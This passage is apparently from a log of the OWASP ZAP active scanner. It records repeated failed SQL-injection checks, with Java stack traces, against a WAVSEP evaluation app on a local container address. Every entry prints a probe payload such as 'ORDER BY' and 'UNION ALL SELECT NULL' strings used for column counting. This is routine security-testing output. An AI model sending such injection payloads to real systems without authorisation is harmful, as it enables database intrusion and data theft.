org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682533 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682534 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini ORDER BY 1-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini ORDER BY 1-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9682535 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini ORDER BY 9540-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini ORDER BY 9540-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9682535 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini UNION ALL SELECT NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682536 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini UNION ALL SELECT NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682537 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini UNION ALL SELECT NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682538 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini UNION ALL SELECT NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682539 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682540 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682540 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682541 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682542 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682543 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at 